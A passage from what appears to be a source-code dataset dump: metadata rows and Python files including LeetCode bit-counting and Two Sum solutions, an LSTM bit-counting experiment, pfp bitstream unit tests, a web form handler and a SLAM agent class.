redirect('/web/menu_principal/tabla_ejemplo')
def formulario_ejemplo_POST(**params):
db = utils.ConnectDB()
if params.get('create') == 'true':
db.execute('INSERT INTO users (user, full_name) VALUES (%s, %s)',(params.get('user'),params.get('full_name')))
else:
db.execute('UPDATE users SET full_name = %s WHERE user = %s',(params.get('full_name'),params.get('user')))
db.execute('COMMIT');
redirect('/web/menu_principal/formulario_ejemplo')
def formulario_ejemplo_DELETE(**params):
try:
db = utils.ConnectDB()
db.execute('DELETE FROM users WHERE user = %s',(params.get('user',''),))
db.execute('COMMIT');
message = 'ok'
except Exception, e:
message = repr(e)
return {'response':True,'message':message}
def typeahead_GET(**params):
return template('typeahead.html')
def ejemplo_escaneo_codigo_barras_GET(**params):
return template("ejemplo_escaneo_codigo_barras.html")
| 2,329 | 0 | 253 |
51e4fed988ec3b764cbf12a2b577969e31033754 | 3,630 | py | Python | leetcode_python/Bit_Manipulation/number-of-1-bits.py | yennanliu/Python_basics | 6a597442d39468295946cefbfb11d08f61424dc3 | [
"Unlicense"
] | 18 | 2019-08-01T07:45:02.000Z | 2022-03-31T18:05:44.000Z | leetcode_python/Bit_Manipulation/number-of-1-bits.py | yennanliu/Python_basics | 6a597442d39468295946cefbfb11d08f61424dc3 | [
"Unlicense"
] | null | null | null | leetcode_python/Bit_Manipulation/number-of-1-bits.py | yennanliu/Python_basics | 6a597442d39468295946cefbfb11d08f61424dc3 | [
"Unlicense"
] | 15 | 2019-12-29T08:46:20.000Z | 2022-03-08T14:14:05.000Z | """
191. Number of 1 Bits (Hamming weight)
Easy
Share
Write a function that takes an unsigned integer and returns the number of '1' bits it has (also known as the Hamming weight).
Note:
Note that in some languages, such as Java, there is no unsigned integer type. In this case, the input will be given as a signed integer type. It should not affect your implementation, as the integer's internal binary representation is the same, whether it is signed or unsigned.
In Java, the compiler represents the signed integers using 2's complement notation. Therefore, in Example 3, the input represents the signed integer. -3.
Example 1:
Input: n = 00000000000000000000000000001011
Output: 3
Explanation: The input binary string 00000000000000000000000000001011 has a total of three '1' bits.
Example 2:
Input: n = 00000000000000000000000010000000
Output: 1
Explanation: The input binary string 00000000000000000000000010000000 has a total of one '1' bit.
Example 3:
Input: n = 11111111111111111111111111111101
Output: 31
Explanation: The input binary string 11111111111111111111111111111101 has a total of thirty one '1' bits.
Constraints:
The input must be a binary string of length 32.
Follow up: If this function is called many times, how would you optimize it?
"""
# V0
# The bin() method returns the binary string equivalent to the given integer.
# V0'
# IDEA : bit manipulation : n&(n-1) CAN REMOVE LAST 1 PER LOOP
# https://github.com/labuladong/fucking-algorithm/blob/master/%E7%AE%97%E6%B3%95%E6%80%9D%E7%BB%B4%E7%B3%BB%E5%88%97/%E5%B8%B8%E7%94%A8%E7%9A%84%E4%BD%8D%E6%93%8D%E4%BD%9C.md
# V1
# http://bookshadow.com/weblog/2015/03/10/leetcode-number-1-bits/
# IDEA : BITWISE OPERATOR
# https://wiki.python.org/moin/BitwiseOperators
# x & y
# Does a "bitwise and". Each bit of the output is 1 if the corresponding bit of x AND of y is 1, otherwise it's 0.
# e.g. :
# 111 & 111 = 111
# 111 & 100 = 100
# 1 & 0 = 0
# 1 & 1 = 1
# 0 & 0 = 0
# @param n, an integer
# @return an integer
# V1'
# http://bookshadow.com/weblog/2015/03/10/leetcode-number-1-bits/
# @param n, an integer
# @return an integer
# V1''
# https://blog.csdn.net/coder_orz/article/details/51323188
# IDEA
# The bin() method returns the binary string equivalent to the given integer.
# V2
# Time: O(logn) = O(32)
# Space: O(1)
# @param n, an integer
# @return an integer
| 28.359375 | 278 | 0.637741 | """
191. Number of 1 Bits (Hamming weight)
Easy
Share
Write a function that takes an unsigned integer and returns the number of '1' bits it has (also known as the Hamming weight).
Note:
Note that in some languages, such as Java, there is no unsigned integer type. In this case, the input will be given as a signed integer type. It should not affect your implementation, as the integer's internal binary representation is the same, whether it is signed or unsigned.
In Java, the compiler represents the signed integers using 2's complement notation. Therefore, in Example 3, the input represents the signed integer. -3.
Example 1:
Input: n = 00000000000000000000000000001011
Output: 3
Explanation: The input binary string 00000000000000000000000000001011 has a total of three '1' bits.
Example 2:
Input: n = 00000000000000000000000010000000
Output: 1
Explanation: The input binary string 00000000000000000000000010000000 has a total of one '1' bit.
Example 3:
Input: n = 11111111111111111111111111111101
Output: 31
Explanation: The input binary string 11111111111111111111111111111101 has a total of thirty one '1' bits.
Constraints:
The input must be a binary string of length 32.
Follow up: If this function is called many times, how would you optimize it?
"""
# V0
# The bin() method returns the binary string equivalent to the given integer.
class Solution(object):
def hammingWeight(self, n):
"""
:type n: int
:rtype: int
"""
return bin(n).count('1')
# V0'
# IDEA : bit manipulation : n&(n-1) CAN REMOVE LAST 1 PER LOOP
# https://github.com/labuladong/fucking-algorithm/blob/master/%E7%AE%97%E6%B3%95%E6%80%9D%E7%BB%B4%E7%B3%BB%E5%88%97/%E5%B8%B8%E7%94%A8%E7%9A%84%E4%BD%8D%E6%93%8D%E4%BD%9C.md
class Solution:
def hammingWeight(self, n: int) -> int:
# define a count, number of `1`
count = 0
# before n != 0 (binary), we will use a while loop keep remove `1` and update number of `1`
while n!=0:
# use the ` n&(n-1)` trick mentioned in fucking-algorithm to remove last `1`
n = n & (n-1)
count+=1
# when n==0, return the total count of `1`
return count
# V1
# http://bookshadow.com/weblog/2015/03/10/leetcode-number-1-bits/
# IDEA : BITWISE OPERATOR
# https://wiki.python.org/moin/BitwiseOperators
# x & y
# Does a "bitwise and". Each bit of the output is 1 if the corresponding bit of x AND of y is 1, otherwise it's 0.
# e.g. :
# 111 & 111 = 111
# 111 & 100 = 100
# 1 & 0 = 0
# 1 & 1 = 1
# 0 & 0 = 0
class Solution:
# @param n, an integer
# @return an integer
def hammingWeight(self, n):
ans = 0
while n:
ans += n & 1
n >>= 1
return ans
# V1'
# http://bookshadow.com/weblog/2015/03/10/leetcode-number-1-bits/
class Solution:
# @param n, an integer
# @return an integer
def hammingWeight(self, n):
ans = 0
while n:
n &= n - 1
ans += 1
return ans
# V1''
# https://blog.csdn.net/coder_orz/article/details/51323188
# IDEA
# The bin() method returns the binary string equivalent to the given integer.
class Solution(object):
def hammingWeight(self, n):
"""
:type n: int
:rtype: int
"""
return bin(n).count('1')
# V2
# Time: O(logn) = O(32)
# Space: O(1)
class Solution(object):
# @param n, an integer
# @return an integer
def hammingWeight(self, n):
result = 0
while n:
n &= n - 1
result += 1
return result
| 752 | 248 | 236 |
0c5221c48bef1567e6b1d71ee6d2abedfba75e10 | 5,014 | py | Python | lstm_count.py | krrish94/learn_tensorflow | b5725bfbd09911e7c7342ab76eea07e294d5573c | [
"MIT"
] | null | null | null | lstm_count.py | krrish94/learn_tensorflow | b5725bfbd09911e7c7342ab76eea07e294d5573c | [
"MIT"
] | null | null | null | lstm_count.py | krrish94/learn_tensorflow | b5725bfbd09911e7c7342ab76eea07e294d5573c | [
"MIT"
] | null | null | null | # LSTM to count the number of '1's in a binary string
# Reference: https://becominghuman.ai/a-noobs-guide-to-implementing-rnn-lstm-using-tensorflow-1907a5bbb1fa
import numpy as np
from random import shuffle
import tensorflow as tf
"""
Parameters
"""
# Seed for all RNGs
rng_seed = 12345
np.random.seed(rng_seed)
tf.set_random_seed(rng_seed)
# Length of each binary string (i.e., length of each input sequence)
seq_len = 15
# Maximum range (i.e., max val of the integer reprsented by the bit string)
# Note that, max val is 2**num_range
num_range = 15
# Train split (fraction of data to be used for training)
train_split = 0.8
# Number of train samples
num_samples = 2 ** num_range
num_train = int(np.floor(train_split * num_samples))
num_test = num_samples - num_train
# Dimensions
dim_input = 1
dim_output = num_range + 1 # Since num of bits can only be in the range [0, num_range]
# Model parameters
num_hidden = 10
# Other hyperparameters
batch_size = 50
learning_rate = 0.01
momentum = 0.09
beta1 = 0.7
num_epochs = 10
num_train_batches = int(np.floor(float(num_train) / float(batch_size)))
num_test_batches = int(np.floor(float(num_test) / float(batch_size)))
# Verbosity controls
print_experiment_summary = True
if print_experiment_summary:
print('Total number of samples:', num_samples)
print('Train samples:', num_train)
print('Test samples:', num_test)
print('Batch size:', batch_size)
print('Train batches:', num_train_batches)
print('Test batches:', num_test_batches)
print('Max epochs:', num_epochs)
print_train_every = 100
print_test_every = 10
"""
Generate training data
"""
# Generate all strings of numbers in the interval [0, 2**num_range]
dataset = ['{0:^0{str_len}b}'.format(i, str_len = seq_len) for i in range(2**num_range)]
# Convert the string to a set of integers
dataset = np.array([[[int(j)] for j in list(dataset[i])] for i in range(len(dataset))])
# print(dataset)
labels_helper = np.array([[np.sum(num)] for num in dataset])
labels = np.zeros((num_samples, dim_output))
cur = 0
for ind in labels_helper:
labels[cur][ind] = 1.0
cur += 1
# print(labels)
"""
Build the computation graph
"""
data = tf.placeholder(tf.float32, [None, seq_len, dim_input])
target = tf.placeholder(tf.float32, [None, dim_output])
recurrent_unit = tf.contrib.rnn.LSTMCell(num_hidden)
val, _ = tf.nn.dynamic_rnn(recurrent_unit, data, dtype = tf.float32)
val = tf.transpose(val, [1, 0, 2])
last = tf.gather(val, int(val.get_shape()[0]) - 1)
weight_fc = tf.Variable(tf.truncated_normal([num_hidden, int(target.get_shape()[1])]))
bias_fc = tf.Variable(tf.constant(0.1, shape = [target.get_shape()[1]]))
prediction = tf.nn.softmax(tf.matmul(last, weight_fc) + bias_fc)
cross_entropy = - tf.reduce_sum(target * tf.log(tf.clip_by_value(prediction, 1e-10, 1.0)))
loss = tf.train.AdamOptimizer(learning_rate = learning_rate, beta1 = beta1).minimize(cross_entropy)
# Accuracy computation
mistakes = tf.not_equal(tf.argmax(target, 1), tf.argmax(prediction, 1))
error = tf.reduce_mean(tf.cast(mistakes, tf.float32))
"""
Execute graph
"""
init = tf.global_variables_initializer()
with tf.Session() as sess:
sess.run(init)
epoch = 0
# 'Epoch' loop
while epoch < num_epochs:
batch = 0
# Shuffle train data
train_order = np.random.permutation(num_train)
# 'Iteration' loop
train_error_this_epoch = 0.0
train_error_temp = 0.0
while batch < num_train_batches:
startIdx = batch*batch_size
endIdx = (batch+1)*batch_size
inds = train_order[startIdx:endIdx]
# input_batch, label_batch = dataset[startIdx:endIdx], labels[startIdx:endIdx] # no shuffle
input_batch, label_batch = dataset[inds], labels[inds]
net_out = sess.run([loss, error], feed_dict = {data: input_batch, target: label_batch})
train_error_temp += net_out[1]
train_error_this_epoch += net_out[1]
if batch % print_train_every == 0:
print('Epoch: ', epoch, 'Error: ', train_error_temp/float(print_train_every))
train_error_temp = 0.0
batch += 1
# print('Epoch:', epoch, 'Full train set:', train_error_this_epoch/float(num_train))
# Test
if epoch % 2 == 0:
test_error_this_epoch = 0.0
test_error_temp = 0.0
while batch < num_train_batches + num_test_batches:
startIdx = batch*batch_size
endIdx = (batch+1)*batch_size
input_batch, label_batch = dataset[startIdx:endIdx], labels[startIdx:endIdx]
net_out = sess.run([error, prediction], feed_dict = {data: input_batch, target: label_batch})
test_error_temp += net_out[0]
test_error_this_epoch += net_out[0]
if batch % print_test_every == 0:
print('Epoch: ', epoch, 'Error: ', test_error_temp/float(print_test_every))
test_error_temp = 0.0
random_disp = np.random.randint(batch_size)
print(np.squeeze(input_batch[random_disp]))
print('Pred:', np.argmax(net_out[1][random_disp]), 'GT:', \
np.argmax(label_batch[random_disp]))
batch += 1
print('Epoch: ', epoch, 'Full test set:', test_error_this_epoch/float(num_test))
epoch += 1
| 28.327684 | 106 | 0.719186 | # LSTM to count the number of '1's in a binary string
# Reference: https://becominghuman.ai/a-noobs-guide-to-implementing-rnn-lstm-using-tensorflow-1907a5bbb1fa
import numpy as np
from random import shuffle
import tensorflow as tf
"""
Parameters
"""
# Seed for all RNGs
rng_seed = 12345
np.random.seed(rng_seed)
tf.set_random_seed(rng_seed)
# Length of each binary string (i.e., length of each input sequence)
seq_len = 15
# Maximum range (i.e., max val of the integer reprsented by the bit string)
# Note that, max val is 2**num_range
num_range = 15
# Train split (fraction of data to be used for training)
train_split = 0.8
# Number of train samples
num_samples = 2 ** num_range
num_train = int(np.floor(train_split * num_samples))
num_test = num_samples - num_train
# Dimensions
dim_input = 1
dim_output = num_range + 1 # Since num of bits can only be in the range [0, num_range]
# Model parameters
num_hidden = 10
# Other hyperparameters
batch_size = 50
learning_rate = 0.01
momentum = 0.09
beta1 = 0.7
num_epochs = 10
num_train_batches = int(np.floor(float(num_train) / float(batch_size)))
num_test_batches = int(np.floor(float(num_test) / float(batch_size)))
# Verbosity controls
print_experiment_summary = True
if print_experiment_summary:
print('Total number of samples:', num_samples)
print('Train samples:', num_train)
print('Test samples:', num_test)
print('Batch size:', batch_size)
print('Train batches:', num_train_batches)
print('Test batches:', num_test_batches)
print('Max epochs:', num_epochs)
print_train_every = 100
print_test_every = 10
"""
Generate training data
"""
# Generate all strings of numbers in the interval [0, 2**num_range]
dataset = ['{0:^0{str_len}b}'.format(i, str_len = seq_len) for i in range(2**num_range)]
# Convert the string to a set of integers
dataset = np.array([[[int(j)] for j in list(dataset[i])] for i in range(len(dataset))])
# print(dataset)
labels_helper = np.array([[np.sum(num)] for num in dataset])
labels = np.zeros((num_samples, dim_output))
cur = 0
for ind in labels_helper:
labels[cur][ind] = 1.0
cur += 1
# print(labels)
"""
Build the computation graph
"""
data = tf.placeholder(tf.float32, [None, seq_len, dim_input])
target = tf.placeholder(tf.float32, [None, dim_output])
recurrent_unit = tf.contrib.rnn.LSTMCell(num_hidden)
val, _ = tf.nn.dynamic_rnn(recurrent_unit, data, dtype = tf.float32)
val = tf.transpose(val, [1, 0, 2])
last = tf.gather(val, int(val.get_shape()[0]) - 1)
weight_fc = tf.Variable(tf.truncated_normal([num_hidden, int(target.get_shape()[1])]))
bias_fc = tf.Variable(tf.constant(0.1, shape = [target.get_shape()[1]]))
prediction = tf.nn.softmax(tf.matmul(last, weight_fc) + bias_fc)
cross_entropy = - tf.reduce_sum(target * tf.log(tf.clip_by_value(prediction, 1e-10, 1.0)))
loss = tf.train.AdamOptimizer(learning_rate = learning_rate, beta1 = beta1).minimize(cross_entropy)
# Accuracy computation
mistakes = tf.not_equal(tf.argmax(target, 1), tf.argmax(prediction, 1))
error = tf.reduce_mean(tf.cast(mistakes, tf.float32))
"""
Execute graph
"""
init = tf.global_variables_initializer()
with tf.Session() as sess:
sess.run(init)
epoch = 0
# 'Epoch' loop
while epoch < num_epochs:
batch = 0
# Shuffle train data
train_order = np.random.permutation(num_train)
# 'Iteration' loop
train_error_this_epoch = 0.0
train_error_temp = 0.0
while batch < num_train_batches:
startIdx = batch*batch_size
endIdx = (batch+1)*batch_size
inds = train_order[startIdx:endIdx]
# input_batch, label_batch = dataset[startIdx:endIdx], labels[startIdx:endIdx] # no shuffle
input_batch, label_batch = dataset[inds], labels[inds]
net_out = sess.run([loss, error], feed_dict = {data: input_batch, target: label_batch})
train_error_temp += net_out[1]
train_error_this_epoch += net_out[1]
if batch % print_train_every == 0:
print('Epoch: ', epoch, 'Error: ', train_error_temp/float(print_train_every))
train_error_temp = 0.0
batch += 1
# print('Epoch:', epoch, 'Full train set:', train_error_this_epoch/float(num_train))
# Test
if epoch % 2 == 0:
test_error_this_epoch = 0.0
test_error_temp = 0.0
while batch < num_train_batches + num_test_batches:
startIdx = batch*batch_size
endIdx = (batch+1)*batch_size
input_batch, label_batch = dataset[startIdx:endIdx], labels[startIdx:endIdx]
net_out = sess.run([error, prediction], feed_dict = {data: input_batch, target: label_batch})
test_error_temp += net_out[0]
test_error_this_epoch += net_out[0]
if batch % print_test_every == 0:
print('Epoch: ', epoch, 'Error: ', test_error_temp/float(print_test_every))
test_error_temp = 0.0
random_disp = np.random.randint(batch_size)
print(np.squeeze(input_batch[random_disp]))
print('Pred:', np.argmax(net_out[1][random_disp]), 'GT:', \
np.argmax(label_batch[random_disp]))
batch += 1
print('Epoch: ', epoch, 'Full test set:', test_error_this_epoch/float(num_test))
epoch += 1
| 0 | 0 | 0 |
883d14b1461d66ac48c971c5108dbca8ed428a76 | 1,445 | py | Python | python/167-TwoSumII.py | vermouth1992/Leetcode | 0d7dda52b12f9e01d88fc279243742cd8b4bcfd1 | [
"MIT"
] | null | null | null | python/167-TwoSumII.py | vermouth1992/Leetcode | 0d7dda52b12f9e01d88fc279243742cd8b4bcfd1 | [
"MIT"
] | null | null | null | python/167-TwoSumII.py | vermouth1992/Leetcode | 0d7dda52b12f9e01d88fc279243742cd8b4bcfd1 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Given an array of integers that is already sorted in ascending order, find two numbers such that they add up to a specific target number.
The function twoSum should return indices of the two numbers such that they add up to the target, where index1 must be less than index2.
Please note that your returned answers (both index1 and index2) are not zero-based.
You may assume that each input would have exactly one solution and you may not use the same element twice.
Input: numbers={2, 7, 11, 15}, target=9
Output: index1=1, index2=2
"""
"""
使用2个指针,一开始分别指向第一个数和最后一个数,当两者之和小于target时,左指针右移,当两者之和大于target时,右指针左移
时间:O(n),空间:O(1), 可能有O(log n)的解法吗???
类似问题:653. Two Sum IV - Input is a BST
"""
if __name__ == '__main__':
# for sanity check
nums = [2, 7, 11, 15]
assert(Solution().twoSum(nums, 9) == [1, 2]) | 32.840909 | 137 | 0.640138 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Given an array of integers that is already sorted in ascending order, find two numbers such that they add up to a specific target number.
The function twoSum should return indices of the two numbers such that they add up to the target, where index1 must be less than index2.
Please note that your returned answers (both index1 and index2) are not zero-based.
You may assume that each input would have exactly one solution and you may not use the same element twice.
Input: numbers={2, 7, 11, 15}, target=9
Output: index1=1, index2=2
"""
"""
使用2个指针,一开始分别指向第一个数和最后一个数,当两者之和小于target时,左指针右移,当两者之和大于target时,右指针左移
时间:O(n),空间:O(1), 可能有O(log n)的解法吗???
类似问题:653. Two Sum IV - Input is a BST
"""
class Solution(object):
def twoSum(self, numbers, target):
"""
:type numbers: List[int]
:type target: int
:rtype: List[int]
"""
leftPointer, rightPointer = 1, len(numbers)
while leftPointer < rightPointer:
currentSum = numbers[leftPointer - 1] + numbers[rightPointer - 1]
if currentSum < target:
leftPointer += 1
elif currentSum == target:
return [leftPointer, rightPointer]
else:
rightPointer -= 1
return None
if __name__ == '__main__':
# for sanity check
nums = [2, 7, 11, 15]
assert(Solution().twoSum(nums, 9) == [1, 2]) | 0 | 553 | 24 |
b4420d340795295b5c6df067aacad1f7856079ba | 5,015 | py | Python | tests/test_bitwrap.py | bannsec/pfp | 32f2d34fdec1c70019fa83c7006d5e3be0f92fcd | [
"MIT"
] | 1 | 2018-01-01T12:52:33.000Z | 2018-01-01T12:52:33.000Z | tests/test_bitwrap.py | richinseattle/py010fuzz | 32f2d34fdec1c70019fa83c7006d5e3be0f92fcd | [
"MIT"
] | null | null | null | tests/test_bitwrap.py | richinseattle/py010fuzz | 32f2d34fdec1c70019fa83c7006d5e3be0f92fcd | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# encoding: utf-8
import os
import six
import struct
import sys
import unittest
sys.path.insert(0, os.path.join(os.path.dirname(__file__), ".."))
import pfp
import pfp.errors
from pfp.fields import *
import pfp.utils
from pfp.bitwrap import BitwrappedStream
import utils
if __name__ == "__main__":
unittest.main()
| 30.579268 | 96 | 0.624526 | #!/usr/bin/env python
# encoding: utf-8
import os
import six
import struct
import sys
import unittest
sys.path.insert(0, os.path.join(os.path.dirname(__file__), ".."))
import pfp
import pfp.errors
from pfp.fields import *
import pfp.utils
from pfp.bitwrap import BitwrappedStream
import utils
class TestBitwrap(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def test_bytes_read(self):
stream = six.BytesIO(pfp.utils.binary("abcd"))
bitwrapped = BitwrappedStream(stream)
res = bitwrapped.read(4)
self.assertEqual(pfp.utils.binary("abcd"), res)
def test_bits_read1(self):
stream = six.BytesIO(pfp.utils.binary(chr(int("01010101", 2))))
bitwrapped = BitwrappedStream(stream)
res = bitwrapped.read_bits(8)
self.assertEqual([0,1,0,1,0,1,0,1], res)
def test_bits_read2_padded1(self):
stream = six.BytesIO(pfp.utils.binary(chr(int("11110000",2)) + chr(int("10101010", 2))))
bitwrapped = BitwrappedStream(stream)
bitwrapped.padded = True
res = bitwrapped.read_bits(4)
self.assertEqual([1,1,1,1], res)
res = bitwrapped.read_bits(3)
self.assertEqual([0,0,0], res)
res = bitwrapped.read_bits(4)
self.assertEqual([0,1,0,1], res)
res = bitwrapped.read_bits(5)
self.assertEqual([0,1,0,1,0], res)
def test_bits_read2_padded2(self):
stream = six.BytesIO(pfp.utils.binary(chr(int("11110000",2)) + chr(int("10101010", 2))))
bitwrapped = BitwrappedStream(stream)
bitwrapped.padded = True
res = bitwrapped.read_bits(4)
self.assertEqual([1,1,1,1], res)
next_byte = bitwrapped.read(1)
self.assertEqual(pfp.utils.binary(chr(int("10101010", 2))), next_byte)
def test_bits_read_unpadded(self):
stream = six.BytesIO(pfp.utils.binary(chr(int("11110000",2)) + chr(int("10101010", 2))))
bitwrapped = BitwrappedStream(stream)
bitwrapped.padded = False
res = bitwrapped.read_bits(4)
self.assertEqual([1,1,1,1], res)
res = bitwrapped.read(1)
self.assertEqual(pfp.utils.binary(chr(int("00001010", 2))), res)
res = bitwrapped.read_bits(4)
self.assertEqual([1,0,1,0], res)
def test_bits_read_unpadded(self):
stream = six.BytesIO(pfp.utils.binary(chr(int("11110000",2)) + chr(int("10101010", 2))))
bitwrapped = BitwrappedStream(stream)
bitwrapped.padded = False
res = bitwrapped.read_bits(4)
self.assertEqual([1,1,1,1], res)
res = bitwrapped.read(1)
self.assertEqual(pfp.utils.binary(chr(int("00001010", 2))), res)
res = bitwrapped.read_bits(4)
self.assertEqual([1,0,1,0], res)
def test_bits_write_padded(self):
stream = six.BytesIO()
bitwrapped = BitwrappedStream(stream)
bitwrapped.padded = True
bitwrapped.write_bits([1,1,0,1])
# should go to a new byte now, zero padded after the
# 1101 bits
bitwrapped.write(pfp.utils.binary("hello"))
self.assertEqual(stream.getvalue(), pfp.utils.binary(chr(int("11010000", 2)) + "hello"))
def test_unconsumed_ranges1(self):
stream = six.BytesIO(pfp.utils.binary("A" * 100))
bitwrapped = BitwrappedStream(stream)
bitwrapped.read(10)
bitwrapped.seek(bitwrapped.tell()+10)
bitwrapped.read(10)
bitwrapped.seek(bitwrapped.tell()+10)
bitwrapped.read(10)
uranges = bitwrapped.unconsumed_ranges()
# test (11,20]
self.assertEqual(len(uranges[11]), 1)
self.assertEqual(len(uranges[10]), 0)
self.assertEqual(len(uranges[19]), 1)
self.assertEqual(len(uranges[20]), 0)
# test (31,40]
self.assertEqual(len(uranges[31]), 1)
self.assertEqual(len(uranges[30]), 0)
self.assertEqual(len(uranges[39]), 1)
self.assertEqual(len(uranges[40]), 0)
def test_unconsumed_ranges2(self):
stream = six.BytesIO(pfp.utils.binary("A" * 100))
bitwrapped = BitwrappedStream(stream)
bitwrapped.read(10)
bitwrapped.seek(bitwrapped.tell()+10)
# it should not need a second read to add the
# unconsumed range
uranges = bitwrapped.unconsumed_ranges()
self.assertEqual(len(uranges), 1)
# test (11,20]
self.assertEqual(len(uranges[11]), 1)
self.assertEqual(len(uranges[10]), 0)
self.assertEqual(len(uranges[19]), 1)
self.assertEqual(len(uranges[20]), 0)
def test_unconsumed_ranges3(self):
stream = six.BytesIO(pfp.utils.binary("A" * 100))
bitwrapped = BitwrappedStream(stream)
bitwrapped.read(10)
# it should not need a second read to add the
# unconsumed range
uranges = bitwrapped.unconsumed_ranges()
self.assertEqual(len(uranges), 0)
if __name__ == "__main__":
unittest.main()
| 4,284 | 16 | 370 |
10ce8036ec86918bb92e84b481c7b92c24d378cf | 8,054 | py | Python | slam/agent.py | FedeClaudi/Slam | 37911b410a85f3884bf0f49c2a5a4a4310efed92 | [
"MIT"
] | 3 | 2021-12-12T22:48:46.000Z | 2022-01-19T22:49:52.000Z | slam/agent.py | FedeClaudi/Slam | 37911b410a85f3884bf0f49c2a5a4a4310efed92 | [
"MIT"
] | null | null | null | slam/agent.py | FedeClaudi/Slam | 37911b410a85f3884bf0f49c2a5a4a4310efed92 | [
"MIT"
] | null | null | null | import matplotlib.pyplot as plt
from matplotlib.patches import Rectangle, Circle
import numpy as np
from typing import List, Tuple
from loguru import logger
from kino.geometry.point import Point
from kino.geometry import Vector
from myterial import blue_dark, pink
from slam.environment import Environment
from slam.map import Map
from slam.ray import Ray
from slam.behavior import (
BehavioralRoutine,
Explore,
Backtrack,
SpinScan,
NavigateToNode,
)
from slam.planner import Planner
| 29.394161 | 86 | 0.507822 | import matplotlib.pyplot as plt
from matplotlib.patches import Rectangle, Circle
import numpy as np
from typing import List, Tuple
from loguru import logger
from kino.geometry.point import Point
from kino.geometry import Vector
from myterial import blue_dark, pink
from slam.environment import Environment
from slam.map import Map
from slam.ray import Ray
from slam.behavior import (
BehavioralRoutine,
Explore,
Backtrack,
SpinScan,
NavigateToNode,
)
from slam.planner import Planner
class Agent:
# geometry/drawing
width: int = 3
height: int = 4
head_width: float = 1.5
color: str = blue_dark
head_color: str = pink
# movement
speed: float = 1
max_turn: int = 60
# LIDAR rays
ray_length: int = 14
collision_distance: int = 6
# SLAM
update_map_every: int = 25 # update map every n timesteps
def __init__(
self,
environment: Environment,
x: float = 0,
y: float = 0,
angle: float = 0,
):
self.environment = environment
if self.environment.is_point_in_obstacle(Point(x, y)):
logger.info(
"Initial Agent point was in an obstacle, picked a random one instead."
)
point = self.environment.random_point()
x, y = point.x, point.y
self.x: float = x
self.y: float = y
self.angle: float = angle
self.trajectory = dict(x=[x], y=[y])
# make rays
self.rays = [
Ray(self, angle, self.ray_length)
for angle in (-40, -20, 0, 20, 40)
]
# update rays
for ray in self.rays:
ray.scan(self.environment.obstacles)
# initiliaze map
self.map = Map(self)
self._current_routine: BehavioralRoutine = Explore()
# initialize planner
self.planner = Planner()
self.n_time_steps = 0
self.routine_name: List[
int
] = [] # store which routine is done at each timestep
# -------------------------------- kinematics -------------------------------- #
@property
def COM(self) -> Vector:
return Vector(self.x, self.y)
@property
def head_position(self) -> np.ndarray:
head_shift = Vector(self.height / 2, 0).rotate(self.angle)
return (self.COM + head_shift).as_array()
def set(self, **kwargs):
for k, val in kwargs.items():
if k in self.__dict__.keys():
setattr(self, k, val)
else:
raise ValueError(f'Cannot set value for "{k}"')
# --------------------------------- behavior --------------------------------- #
def check_touching(self) -> Tuple[List[bool], float]:
"""
Checks which of the rays are touching an object and returns the
distance of the closest objct
"""
touching_distance: float = self.collision_distance * 2
touching = [False for n in range(len(self.rays))]
for n, ray in enumerate(self.rays):
if ray.contact_point is not None:
if ray.contact_point.distance < self.collision_distance:
touching[n] = True
touching_distance = min(
touching_distance, ray.contact_point.distance
)
return touching, touching_distance
def select_routine(self, touching: List[bool], touching_distance: float):
"""
Selects which routine to execute
"""
if self._current_routine.name == "exploration":
if touching_distance < self.speed:
# backtrack: avoid collision
if touching[0] and touching[-1]:
self._current_routine = Backtrack()
elif np.random.rand() < 0.005 and np.any(touching):
# do a spin
self._current_routine = SpinScan()
elif np.random.rand() < 0.012 and self.n_time_steps > 10:
# explore an 'uncertain' node in the graph
self.slam()
node = self.planner.get_uncertain_node()
if node is not None:
self._current_routine = NavigateToNode(
self, self.planner, node
)
# elif np.any(touching) and np.random.rand() < .4:
# follow object
# TODO follow object walls
else:
if self._current_routine.completed:
self._current_routine = Explore()
def move(self):
"""
Moves the agent
"""
# check if we are within collision distance for any ray
touching, touching_distance = self.check_touching()
# get movement commands
self.select_routine(touching, touching_distance)
speed, steer_angle = self._current_routine.get_commands(
self, touching, touching_distance
)
# store variables and move
self._current_speed = speed
self._current_omega = steer_angle
self.x += speed * np.cos(np.radians(self.angle))
self.y += speed * np.sin(np.radians(self.angle))
self.angle += steer_angle
self.trajectory["x"].append(self.x)
self.trajectory["y"].append(self.y)
def update(self):
# move
self.move()
# update rays
for ray in self.rays:
ray.scan(self.environment.obstacles)
# update map entries
self.map.add(
*[
ray.contact_point
for ray in self.rays
if ray.contact_point is not None
]
)
# generate map
if self.n_time_steps % self.update_map_every == 0:
self.slam()
self.n_time_steps += 1
self.routine_name.append(self._current_routine.ID)
# ------------------------------- slam/planning ------------------------------ #
def slam(self):
""" Builds a map + agent localization and activates the planner
"""
logger.debug(f"Agent, SLAM at timestep: {self.n_time_steps}")
self.map.build()
self.planner.build(list(self.map.grid_points.values()))
# ----------------------------------- draw ----------------------------------- #
def draw(self, ax: plt.Axes, just_agent: bool = False):
"""
Draws the agent as a rectangle with a circle for head
"""
# draw body, get rectangle corner first
body_shift = Vector(-self.height / 2, -self.width / 2).rotate(
self.angle
)
ax.add_artist(
Rectangle(
(self.COM + body_shift).as_array(),
self.height,
self.width,
self.angle,
facecolor=self.color,
lw=1,
edgecolor="k",
zorder=100,
)
)
# draw head
ax.add_artist(
Circle(
self.head_position,
self.head_width,
facecolor=self.head_color,
lw=1,
edgecolor="k",
zorder=100,
)
)
if not just_agent:
# add rays
for ray in self.rays:
ray.draw(ax)
# draw trace
ax.plot(
self.trajectory["x"],
self.trajectory["y"],
lw=0.5,
color="k",
zorder=-1,
alpha=0.5,
label="trajectory",
)
# mark routine at each timestep
# ax.scatter(
# self.trajectory["x"][:-1],
# self.trajectory["y"][:-1],
# c=self.routine_name,
# s=20,
# cmap='Dark2',
# zorder=0,
# alpha=1,
# lw=.5,
# ec='k',
# vmin=-1, vmax=10
# )
| 2,058 | 5,466 | 23 |
22c5ffc18357605c1164abb92cfa365a095206d5 | 4,788 | py | Python | CarParkArcGisApi/CarParkArcGisApi/env/Lib/site-packages/arcgis/mapping/_utils.py | moazzamwaheed2017/carparkapi | e52ae1b2aed47321ce9d22ba6cd0b85fa60a417a | [
"MIT"
